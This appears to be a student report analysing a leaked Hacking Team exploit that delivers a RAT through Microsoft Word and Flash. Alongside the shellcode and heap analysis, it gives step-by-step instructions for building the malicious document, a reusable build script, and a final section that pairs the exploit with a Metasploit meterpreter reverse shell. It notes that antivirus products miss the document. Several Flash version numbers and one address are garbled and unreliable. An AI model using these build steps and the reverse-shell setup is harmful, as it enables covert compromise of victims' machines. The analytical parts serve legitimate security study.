In this study (PDF), we assess a Hacking Team exploit that affects Microsoft Office 2007, 2010 and 2013. The exploit leverages the ability of Microsoft Word to render Shockwave Flash files and exploits a vulnerability of Internet Explorer ActiveX. Our reverse engineering of the SWF file (the shellcode container) shows that, to the best of our knowledge, this exploit differs from other analyzed Flash Player exploits. Unfortunately, in 2016, three years later, only 1 out of 54 antivirus products detects the document as malicious. In other words, if a user receives a malicious Microsoft Word file like the one we produced, and she has Avira, AVG, ESET NOD32, Kaspersky, etc. updated to the latest version, she will not be warned about the document and will probably open it. Furthermore, during our exploit testing we found that this exploit still works with Flash versions released in 2015 (refer to Table 1 (list of vulnerable flash versions to HT word 2013 exploit) for the vulnerable versions we found) and Office Word 2013 installed on Windows Seven 32 bit; Microsoft published an update to patch this vulnerability after the HT dump went public. The vulnerability is, however, patched in the last published Flash Player version we tested (refer to Table 1). In the rest of this report we first review our static and dynamic analysis of the exploit builder and the shellcode, and then we combine the two results. Finally, we describe how to build a Microsoft Word exploit using the source code published from Hacking Team.
In this section we review our assessment of the exploit builder (ht-2013-002-Word\exploit.py), the ActiveX bin file (ht-2013-002-Word\resources\activeX\activeX1.bin), the shellcode (ht-2013-002-Word\resources\shellcode) and the final swf file that is produced. Because these resources are tightly coupled, we analyze them together.
The HT Word 2013 exploit comes with a builder. The builder is a Python script, exploit.py, that combines the shellcode, the payload and a docx file and produces a swf file, a dat file and the malicious docx file. The final outcome of running the exploit depends entirely on the loaded payload. Figure 1 shows the exploit generation process:
Figure 1 (HT word 2013 exploit generation process)
Embedding Activex and ShockWaveFlash exploit
This exploit embeds an ActiveX binary which in turn runs a Shockwave Flash file. The shellcode itself is in the Shockwave Flash file. To do this, the builder script loads the input docx file, unpacks it, adds the required bin file and then packs it again using zip.exe. This is possible because Word follows the Office Open XML standard, in which a document is a zip package of XML and media files.
A docx file is actually a package of all the parts and media files that make up the document. If you unpack the file, either with an unpacker or by changing the docx extension to zip and unzipping it, you will find several files and directories inside a single docx file:
Figure 2 (docx file unpacked)
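As a rough illustration of the package layout described above, the following sketch lists the parts of a docx package with Python's standard zipfile module. It is not part of the Hacking Team builder; the function names and the tiny in-memory sample package are our own assumptions, used only so that the example runs without a real document.

```python
import io
import zipfile


def list_docx_parts(docx_source):
    """Return the sorted part names stored inside a .docx package.

    docx_source may be a file path or a binary file-like object.
    """
    with zipfile.ZipFile(docx_source) as package:
        return sorted(package.namelist())


def build_sample_docx():
    """Build a tiny in-memory package with a typical part layout.

    The XML bodies are placeholders, not a valid Word document.
    """
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as package:
        package.writestr("[Content_Types].xml", "<Types/>")
        package.writestr("_rels/.rels", "<Relationships/>")
        package.writestr("word/document.xml", "<document/>")
        package.writestr("word/_rels/document.xml.rels", "<Relationships/>")
    buffer.seek(0)
    return buffer


if __name__ == "__main__":
    for name in list_docx_parts(build_sample_docx()):
        print(name)
```

Passing the path of a real docx file to list_docx_parts gives the same kind of listing as the unpacked view in Figure 2.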
Explaining all the files and their details is out of the scope of this report; for further information refer to the ISO/IEC 29500 standard. Here we explain only the parts required for our analysis.
The ActiveX bin file is eventually copied into the media folder, but in order for Microsoft Word to load and run it, the exploit builder updates [Content_Types].xml (to load the components that run the SWF) and the relationship links in word/_rels/document.xml.rels:
Figure 3 (Add Activex loader component)
Finally, to place the Shockwave Flash file in the document, the exploit updates word/document.xml, the file that contains the body and content of the docx file, so that it renders the swf:
Figure 4 (adding swf loader to the docx)
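From a defender's point of view, the modifications described above leave visible traces in the package. The sketch below is our own illustration, not code from exploit.py. It flags parts whose name mentions ActiveX and Override entries in [Content_Types].xml whose content type mentions ActiveX. The helper name and the simple substring heuristic are assumptions; a legitimate document with embedded controls would be flagged as well.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Namespace of the Open Packaging Conventions content-types part.
CONTENT_TYPES_NS = "{http://schemas.openxmlformats.org/package/2006/content-types}"


def find_activex_parts(docx_source):
    """Return sorted part names that look ActiveX-related (heuristic)."""
    hits = set()
    with zipfile.ZipFile(docx_source) as package:
        names = package.namelist()
        # 1. Any stored part whose path mentions ActiveX.
        for name in names:
            if "activex" in name.lower():
                hits.add(name)
        # 2. Any Override whose declared content type mentions ActiveX.
        if "[Content_Types].xml" in names:
            root = ET.fromstring(package.read("[Content_Types].xml"))
            for override in root.iter(CONTENT_TYPES_NS + "Override"):
                content_type = override.get("ContentType", "")
                if "activex" in content_type.lower():
                    hits.add(override.get("PartName", "").lstrip("/"))
    return sorted(hits)
```

An empty result does not prove that a document is clean; it only means that this particular heuristic found nothing.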
The exploit is well engineered in that the shellcode is separate from the executable. In other words, the shellcode file is just the first stage that loads the final payload (RAT). During the build phase the shellcode is inserted into the swf file. Here is how:
Figure 5 (exploit.py SWF preparation)
In the first highlighted part (Figure 5) the shellcode offset in the swf file is read, and in the second part the content of the shellcode file is read. Afterwards the shellcode is written to the swf file. After integration the swf looks like this, with the highlighted part containing the shellcode:
Figure 6 (Shellcode opcode)
There is another level of parameterization and that is reading the malware installer from the network:
Figure 7(exploit.py and shellcode parameterization)
As you can see from the first highlighted part, the location of the server payload file sits 8 bytes from the start of the shellcode file. After the RAT exe is given as input, the builder creates a dat file with a random name, and the address of that dat file is written at this location. Other parameters are initialized accordingly, as shown in parts 2 and 3 (Figure 7).
Finally, the ActiveX binary file that executes the swf is modified so that it reads the swf file from the server; the address is inserted in 3 places:
Figure 8(setting swf address)
These lines find the 3 http strings in the bin file and replace them with the server swf address:
Figure 9 (the bin ActiveX reverse engineered)
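For an analyst who receives a suspicious bin file, the embedded addresses can be recovered without running anything. The following sketch is our own helper, not taken from the builder. It scans a byte blob for http strings stored either as plain ASCII or as UTF-16LE and reports their offsets. Whether activeX1.bin stores its strings in one encoding or the other is not stated in this report, so the sketch simply checks both.

```python
import re

# URLs stored as plain ASCII bytes.
ASCII_URL = re.compile(rb"https?://[\x21-\x7e]+")
# URLs stored as UTF-16LE (each printable character followed by a zero byte).
UTF16_URL = re.compile(
    rb"(?:h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00)(?:[\x21-\x7e]\x00)+"
)


def extract_http_strings(blob):
    """Return sorted (offset, url) pairs for URLs found in a byte blob."""
    found = []
    for match in ASCII_URL.finditer(blob):
        found.append((match.start(), match.group().decode("ascii")))
    for match in UTF16_URL.finditer(blob):
        found.append((match.start(), match.group().decode("utf-16-le")))
    return sorted(found)
```

Applied to a modified bin file, a helper like this would be expected to list the three places where the server swf address was written.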
Finally, running this exploit prepares two packages: one to send to the target, and one containing a swf file and a dat file for the server:
Figure 10 (packaging the output, exploit.py)
The exploit builder is invoked like this:
python exploit.py payload:http %URL% "%OUTPUT%" "%FILE%" "%FILENAME%" %AGENT% %OUTPUT_SERVER% %SCOUT_NAME%.exe
In the following section we explain each parameter:
- URL: is the url that will be called from the victim to download the malicious agent
- OUTPUT: name of the zip file to generate with malicious document
- FILE: input document to modify
- FILENAME: name of the malicious document for the victim
- AGENT: name or path of the RAT or Trojan to inject to the victim system
- OUTPUT_SERVER: zip file generated for the server [contains encrypted malware and malicious swf]
- SCOUT_NAME: name the RAT will have once it is installed on the victim machine
A practical usage of this example is reviewed in Requirements to build the exploit section.
In this section we mainly report the results of our manual dynamic analysis of the exploit (to learn about the exploit production and our testing environment, please refer to the Exploit Testing section). In a nutshell, when the user opens the docx file the following sequence of actions takes place:
- Word loads the components to run SWF file
- Word asks internet explorer to download a SWF file
- Victim guest downloads the swf file from the web server
- Word gives control to installed flash to run SWF file
- The swf file exploits a vulnerability of the Flash ActiveX and places the shellcode in memory
- The shellcode starts to run
- The shellcode will download the dat file
- The dat file will be renamed to HEYFINDME.exe (the name we gave to the exploit builder)
- It will be placed in the startup folder
We started our analysis by examining the network traffic using Wireshark. Afterwards we used the memory usage graph and Procmon to analyze the sequence of filesystem, registry, network and process events. Using the data taken from Procmon together with the results of our static analysis, we used WinDbg to inspect memory.
Network traffic analysis of the Word 2013 exploit
To analyze the network traffic we used Wireshark. To find the exploit traffic more easily we filtered for HTTP requests, since our static analysis showed that the exploit connects to an address starting with http://. The filter was “http and ip.dst!=18.104.22.168”, which shows only HTTP traffic and removes packets going to the multicast address. After opening the docx file we could spot two requests, one for the swf file and one for the dat file (Figure 11). Moreover, we could match this traffic to the Word process using the ProcMon TCP operation filter (Figure 12).
Figure 11 (HT Word 2013 exploit traffic analysis)
Figure 12(Word exploit TCP send request)
The first request is issued even with non-vulnerable Flash players on Windows XP, but the second is only issued if the exploitation is successful. Another interesting point is the behavior when the document is opened a second time, or when the swf is not accessible. In the former case the file is not downloaded again because the server returns a 304 status code. In the latter case the request is sent and the exploit works as expected.
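The same two-request pattern can also be checked on the server side. The sketch below is a hypothetical helper that assumes the web server writes its access log in the Apache common log format; we did not verify the log format of our Xampp installation for this report. It groups swf and dat requests by client and reports whether a dat request followed a swf request, which according to the observation above would indicate a successful exploitation.

```python
import re

# Apache "common" log format (assumed, see the note above).
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def fetches_by_client(lines, extensions=(".swf", ".dat")):
    """Group requests for the given file extensions by client address."""
    result = {}
    for line in lines:
        match = LOG_LINE.match(line)
        if not match:
            continue  # skip lines that are not in the assumed format
        path = match.group("path").split("?", 1)[0]
        if path.lower().endswith(extensions):
            result.setdefault(match.group("client"), []).append(
                (path, int(match.group("status")))
            )
    return result


def second_stage_seen(fetches):
    """Return True if a .dat request follows a .swf request."""
    seen_swf = False
    for path, _status in fetches:
        if path.lower().endswith(".swf"):
            seen_swf = True
        elif seen_swf and path.lower().endswith(".dat"):
            return True
    return False
```

A client that shows only a swf request, for example one answered with a 304 status code, would not be reported by second_stage_seen.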
Heap spraying is a likely technique for this type of exploit, and a large spray is easy to spot at this stage because the system is not yet compromised and the reported data is still trustworthy (Figure 13). In our analysis the memory graph did not show any obvious abnormality.
Memory analysis after clicking word 2013 exploit
Filtering on the text HEYFINDME, which we know will be the name of the payload file on the victim system, we found several events in Process Monitor.
Looking at the sequence of actions, it is clear that the exploit creates the Trojan file in the startup folder. Therefore, no malicious activity happens when the Word file is opened; it is deferred until the next reboot. By opening the event we traced the calls leading to it and, as expected, some caller sources are not known (we analyze these addresses further in the Heap Memory analysis section):
Figure 15(stack traces first trial)
One important observation that we had was the success of the exploit with presence of ASLR. We ran the exploit several times with the same parameters but the stack addresses were different. The next screenshot proves this:
Figure 16 (Address fluctuation by 32MB)
We concluded that the exploit has a precise method of obtaining the shellcode address, because in our Heap Memory analysis we did not find a large NOP sled that would make a random redirection possible.
Heap Memory analysis
After finding the events in ProcMon we used WinDbg to look at the memory more closely. After attaching WinDbg to the Word process we examined the addresses of the loaded modules (Figure 17) to narrow down the possible source of the suspected addresses.
Figure 17 (word exploit loaded modules)
Since the suspected caller is in none of the loaded modules, we examined the heap using the “!heap” command:
Figure 18 (heap allocated memories by Hacking team’s exploit word 2013)
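The check that led us to the heap, namely that the caller address belongs to no loaded module, is a simple range lookup. The sketch below shows the idea; the function name and the module list in the example are hypothetical and are not the values from Figure 17.

```python
def owning_module(address, modules):
    """Return the module whose [start, end) range contains address.

    modules is an iterable of (name, start, end) tuples, for example
    transcribed from a debugger's loaded-module list. Returns None when
    the address lies outside every module, which is what one would
    expect for code running from heap memory.
    """
    for name, start, end in modules:
        if start <= address < end:
            return name
    return None


if __name__ == "__main__":
    # Hypothetical ranges, for illustration only.
    sample_modules = [
        ("WINWORD", 0x2F4A0000, 0x2F600000),
        ("Flash32", 0x5D000000, 0x5E200000),
    ]
    print(owning_module(0x5D001234, sample_modules))  # inside Flash32
    print(owning_module(0x0A459100, sample_modules))  # outside all modules
```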
As you can see in Figure 18, the caller address is near the last allocated heap. This caught our attention, and we analyzed the heap allocations further using the “!heap -s” command:
Figure 19 (Hacking Team's word 2013 exploit heap stat)
As you can see in the statistics, the last 2 allocated heap chunks are fully used and then 1016/1024 are freed for 0a650000, which hints at a heap corruption vulnerability. After this we tried to analyze the last heap slab more closely with the command “!heap -stat -h”:
Figure 20(HT Word 2013 exploit memory corruption)
Surprisingly, the command returns nothing. One strong possibility is that the heap header was overwritten by an overflow.
After analyzing the root cause of the vulnerability we tried to dump the shellcode from memory. To do that we used the data from the Static Analysis section of this study. Using the byte code of the win32 shellcode in the disassembled swf file (Figure 6 (Shellcode opcode)) we started to search the memory.
First we tried to match the first few bytes of the shellcode using the “s -b 0x00000000 L?0x0a45923e 81 e1 ff 0f 00 00 03 c8 83 c1 40 83 c7 40 83 c6 40 51 57 56 e8 a0 fe ff ff c3” command in WinDbg. The search returned 6 matches. We tried to narrow down the results by searching for bytes from the middle of the shellcode; this returned 5 matches. Finally we searched for the last bytes and got two matches:
Figure 21 (HT word 2013 exploit shellcode hunting in memory)
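The same kind of search can be repeated offline on a saved memory dump. The sketch below is our own helper, not a WinDbg feature. It returns every offset at which a byte pattern occurs, using the leading shellcode bytes quoted in the command above as the pattern.

```python
# Leading shellcode bytes, copied from the WinDbg search command above.
SHELLCODE_PREFIX = bytes.fromhex(
    "81 e1 ff 0f 00 00 03 c8 83 c1 40 83 c7 40 83 c6 40 "
    "51 57 56 e8 a0 fe ff ff c3"
)


def find_all(data, pattern):
    """Return every offset at which pattern occurs in data.

    Overlapping occurrences are reported as well.
    """
    offsets = []
    start = data.find(pattern)
    while start != -1:
        offsets.append(start)
        start = data.find(pattern, start + 1)
    return offsets


def search_dump(path, pattern=SHELLCODE_PREFIX):
    """Search a dump file on disk (the whole file is read into memory)."""
    with open(path, "rb") as dump:
        return find_all(dump.read(), pattern)
```

As in the WinDbg session, several hits are possible, so each match still has to be checked against the surrounding code before it is accepted as the real location of the shellcode.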
By examining the assembly code in the matched areas and comparing these addresses to the ProcMon result (Figure 17 (word exploit loaded modules)), we can assert with confidence that 0a459100 was the start address of the shellcode and 0a45a36b was the end. These values hold only for that specific run, since the addresses change because of ASLR. Using these two addresses we dumped the shellcode to a file with the “.writemem c:\shellcode.dump 0a459100 0a45a36b” command.
Now that we are certain about the location of the shellcode in memory, we can match the ProcMon events to the shellcode assembly code.
Mapping dynamic info to shellcode source code
According to ProcMon, a series of events querying the contents of the startup folder can be seen (Figure 22). At offset 0x87F from the start address of the shellcode (this offset can also be used to find the byte opcode in the disassembled fla file) there is a portion of code that is responsible for this. This portion starts at line 720 of the equivalent asm file:
    push 8000h
    push [ebp+var_8]
    push [ebp+var_4]
    mov eax, [ebp+arg_0]
    call dword ptr [eax+80h]
Figure 22 (startup query events)
According to the stack trace, this portion is called from line 1600 (0xFC5 from the start of the shellcode), that is:
    lea eax, [ebp+var_88]
    push eax
    call sub_801
This line is in turn called by the last line of the shellcode, which shows that the previous portion is part of the main flow of the shellcode. As you can see in Figure 22, after these requests we have TCP requests, which suggests that the download of the .dat file (the RAT or Trojan) happens here. This means the download happens in the lines that follow the return from the “startup folder query”.
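The offsets quoted above are relative to the start of the shellcode, while ProcMon and WinDbg report absolute addresses. The small sketch below converts between the two, using the start and end addresses observed in our specific run (they change on every run because of ASLR). The helper names are our own.

```python
# Addresses observed in one specific run; ASLR changes them every time.
SHELLCODE_START = 0x0A459100
SHELLCODE_END = 0x0A45A36B


def to_absolute(offset, base=SHELLCODE_START):
    """Convert an offset inside the shellcode to an absolute address."""
    return base + offset


def to_offset(address, base=SHELLCODE_START, end=SHELLCODE_END):
    """Convert an absolute address back to an offset inside the shellcode."""
    if not base <= address <= end:
        raise ValueError("address is outside the shellcode range")
    return address - base


if __name__ == "__main__":
    print(hex(to_absolute(0x87F)))  # startup folder query portion
    print(hex(to_absolute(0xFC5)))  # caller of that portion
    print(hex(SHELLCODE_END - SHELLCODE_START))  # distance start to end
```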
The call that creates the RAT exe file is at line 1628:
    push 0
    push 80h ; '€'
    push 2
    push 0
    push 0
    push 40000000h
    push [ebp+var_90]
    call [ebp+var_14]
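The pushed constants are consistent with a call to the Win32 CreateFile function, although the disassembly itself only shows an indirect call through [ebp+var_14], so the target is an assumption on our part. Under that assumption, and given that stdcall arguments are pushed from right to left, the sketch below pairs each pushed operand with the corresponding CreateFile parameter.

```python
# Well-known Win32 constant values.
GENERIC_WRITE = 0x40000000
CREATE_ALWAYS = 2
FILE_ATTRIBUTE_NORMAL = 0x80

# Parameter order of CreateFile (assumed call target, see the note above).
CREATEFILE_PARAMETERS = [
    "lpFileName",
    "dwDesiredAccess",
    "dwShareMode",
    "lpSecurityAttributes",
    "dwCreationDisposition",
    "dwFlagsAndAttributes",
    "hTemplateFile",
]

# Operands in the order they are pushed at line 1628.
PUSHED = [0, 0x80, 2, 0, 0, 0x40000000, "[ebp+var_90]"]


def label_stdcall_arguments(pushed_values, parameter_names):
    """Pair pushed operands with parameter names.

    stdcall pushes arguments right to left, so the last value pushed
    is the first parameter.
    """
    return dict(zip(parameter_names, reversed(pushed_values)))


if __name__ == "__main__":
    for name, value in label_stdcall_arguments(
        PUSHED, CREATEFILE_PARAMETERS
    ).items():
        print(name, value)
```

Read this way, the call would open the file named by [ebp+var_90] for writing, always creating it, with normal attributes, which matches the file creation event seen in ProcMon.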
After that, the file is written and then closed, at lines 1638 and 1640 respectively:
    push 0
    lea eax, [ebp+var_94]
    push eax
    push [ebp+var_98]
    push [ebp+var_8C]
    push [ebp+var_9C]
    call [ebp+var_10]
    push [ebp+var_9C]
    call [ebp+var_74]
Finally the shellcode returns at line 1655:
    push 1
    mov eax, [ebp+arg_8]
    add eax, 282h
    push eax
    lea eax, [ebp+var_88]
    push eax
    call sub_E6B
The exploit, as mentioned in the Exploit Builder section, is built from the input docx file, the server address and the final Trojan (RAT) to be installed; for the complete parameters refer to the Exploit Builder section. To run the builder successfully, a series of preconfigurations is needed; otherwise the builder fails. These are explained in the section Requirements to build the exploit. To run the exploit on the victim, on the other hand, the vulnerable applications must be installed. This is reviewed in the section Requirements to run the exploit.
The steps are as follows:
- Install a Python version that suits your host (2.6 or 2.7 for 32 bit version or 3.x for 64 bit hosts)
- Install Python easy_install by downloading ez_setup.py and running it
- Install the pylzma library by:
  - Downloading the package
  - Navigating to the folder that contains it
  - Issuing the python -m easy_install pylzma-0.4.2-py2.6-win32.egg command
- Install the zip.exe package that suits your host
- Add the bin folder of the zip package to your Windows PATH environment variable
If all the steps are successfully taken, the exploit builder (exploit.py) can be invoked using a command like this:
- python.exe "F:\Codes\vector-exploit-master\vector-exploit-master\ht-2013-002-Word\exploit.py" payload:http http://10.20.20.111 Trial1 "F:\Codes\vector-exploit-master\word input\expolitable.docx" tricky5.docx "F:\Codes\vector-exploit-master\word input\calc.exe" Payload7 HEYFINDME.exe
For test purposes we suggest using a bat file, because the exploit is one-shot and is useless after a single use. An analyst may therefore need more than 10 exploits at different times during an analysis, and typing the options every time is tedious. Our bat file looked like this:
set "curpath=%__CD__%"
F:
REM Our exploit scripts are in drive F. Change this to yours
cd F:\Codes\vector-exploit-master\vector-exploit-master\ht-2013-002-Word
python.exe "F:\Codes\vector-exploit-master\vector-exploit-master\ht-2013-002-Word\exploit.py" payload:http http://10.20.20.111 Trial1 "F:\Codes\vector-exploit-master\word input\expolitable.docx" tricky5.docx "F:\Codes\vector-exploit-master\word input\calc.exe" Payload7 HEYFINDME.exe
c:
REM Our batch file is in drive C. Change this to yours
cd %curpath%
After running the builder 6 files will be produced (Figure 23):
- one docx file which contains the exploit
- one swf file with random name that contains the shellcode
- one dat file with random name that contains the Trojan to be installed
- one tmp folder that is unpacked version of docx file
- one file without any extension, which is reviewed further in Exploit Bug
- a zip file that contains swf and dat file
The “Trial1” option that we passed to the exploit builder is used as the name of a zip archive that contains the docx exploit. That archive is the file in the list above that has no zip extension. If you include the .zip extension in the builder input, the builder fails, because one part of the code assumes the name already ends in .zip and another part assumes it does not. The two lines are (314 and 315 in exploit.py):
os.system("zip.exe -r \"" + send_to_target_zip + "\" \"" + output_file + "\"")
shutil.move(send_to_target_zip + ".zip", send_to_target_zip) # ‘+ ".zip"’ from the first argument should be removed
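The mismatch between the two lines can be reproduced without running the builder. The sketch below models only the file names involved. It assumes the documented Info-ZIP behavior in which zip.exe appends .zip to an archive name that has no extension and leaves a name that already has one unchanged. The function names are our own and nothing is written to disk.

```python
import os


def archive_written_by_zip(requested_name):
    """Name zip.exe is assumed to write (Info-ZIP naming rule)."""
    _root, extension = os.path.splitext(requested_name)
    return requested_name if extension else requested_name + ".zip"


def move_source_expected_by_builder(requested_name):
    """Name that line 315 passes to shutil.move as the source file."""
    return requested_name + ".zip"


def builder_packaging_succeeds(requested_name):
    """True when the archive written by zip is the one the move looks for."""
    return archive_written_by_zip(requested_name) == \
        move_source_expected_by_builder(requested_name)


if __name__ == "__main__":
    for name in ("Trial1", "Trial1.zip"):
        print(name, builder_packaging_succeeds(name))
```

With "Trial1" both names agree on Trial1.zip, while with "Trial1.zip" the move looks for Trial1.zip.zip, which does not exist.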
There are 3 .yaml files in the ht-2013-002-Word folder that appear to describe the exploit and the vulnerable applications. During our analysis we found this information to be misleading. They mention Flash Player v22.214.171.124 as the first vulnerable version, which is not true. We tested this version of Flash Player on Windows Seven and XP (in conjunction with Office 2010 and 2013) and it was not exploitable. The first vulnerable Flash version we found was 11.5.502.146, which worked both on Windows XP (we tried Office 2010) and Windows Seven (Office 2013), though we mostly used version 11.5.502.146 for our analysis. To run the exploit successfully, one also needs to install a web server and upload the shellcode and the payload. In our case we used Xampp on a Windows operating system. To recap, our working environment for Windows XP x86 was:
- Windows XP x86, service pack 3
- Microsoft office 2010 (to be installed on XP)
- Flash player with activeX version 11.5.502.146 (to be installed on XP)
- Xampp server with the server IP mentioned as parameter for exploit builder and having swf and dat files
And for windows Seven:
- Windows Seven ultimate 32 bit
- Microsoft Office 2013 Office Professional Plus 32 bit (15.0.4420.1017)
- Any flash successful version from the Table 1(list of vulnerable flash versions to HT word 2013 exploit)
- Xampp server with the server IP mentioned as parameter for exploit builder and having swf and dat files
Flash player 11.5.502.146 (with activeX version)
Flash player 11.6.602.180 (with activeX version)
Flash player 126.96.36.199 (with activeX version)
Flash player 188.8.131.52
Flash player 184.108.40.206
Flash player 220.127.116.11
Flash player 18.104.22.1684 (last published version)
Flash player 22.214.171.124
Flash player 126.96.36.199
Table 1(list of vulnerable flash versions to HT word 2013 exploit)
We tried several Flash versions to track the pattern of vulnerability across versions, and it seems that after the first vulnerable version almost all versions were affected until the HT dump. The latest versions are patched, as our analysis suggests. We also tried running the swf file on its own to infect the guest. In this case, after the swf runs, the dat file is downloaded, but it is not placed in the startup folder.
In this study we analyzed the Hacking Team Exploit Delivery service for the Word 2013 exploit by analyzing the exploit builder they used to produce exploits for their customers. We analyzed the shellcode and its execution flow using both static and dynamic analysis. Additionally, we mapped the source code lines to the dynamic data. Furthermore, using our memory analysis data we identified the likely vulnerability that the exploit uses. Finally, we reviewed the environment setup, requirements and configuration needed to test this exploit on two different operating systems and Office versions.
Although this vulnerability is patched on both the Microsoft and the Adobe side, antivirus products cannot detect the exploit. In other words, if a user runs vulnerable versions, her system may still be infected. This is plausible because we found vulnerable Flash Player versions from 2015, and people do not tend to update Office regularly. On the other hand, to the best of our knowledge a detailed explanation of the exploit is not available online, and the root cause of the vulnerability, which we claim is memory corruption, can be assessed further.
Real RAT as payload
In this section we build a meterpreter payload for our exploit and then use Metasploit to get access to the victim host. To do that we first need to build the meterpreter reverse_tcp exe. Open the Metasploit msfconsole and enter the following commands:
use windows/meterpreter/reverse_tcp
generate -o LPORT=[your-port],LHOST=[your-ip] -t exe -f meterpreter.exe
[your-ip] will be the ip of the system that metasploit is installed on, something like 192.168.1.1.
Then input meterpreter.exe as your tool for the exploit builder:
python.exe "F:\Codes\vector-exploit-master\vector-exploit-master\ht-2013-002-Word\exploit.py" payload:http http://[your-ip]/[the-folder-that-contains-swf-and-dat] Trial5.zip "F:\Codes\vector-exploit-master\word input\expolitable.docx" tricky5.docx "F:\Codes\vector-exploit-master\word input\meterpreter.exe" Payload7 meter.exe
After that, open your msfconsole and enter the following:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.56.1
set LPORT 88
exploit
After executing these commands, Metasploit waits for the victim machine to connect, which happens when the victim restarts after opening the malicious Word document. You will be presented with the meterpreter console after the restart.
This Report has been submitted in Partial Fulfilment of the Course Offensive Technologies, Università degli Studi di Trento, Master of Science in Computer Science, EIT Digital Master of Science in Security and Privacy.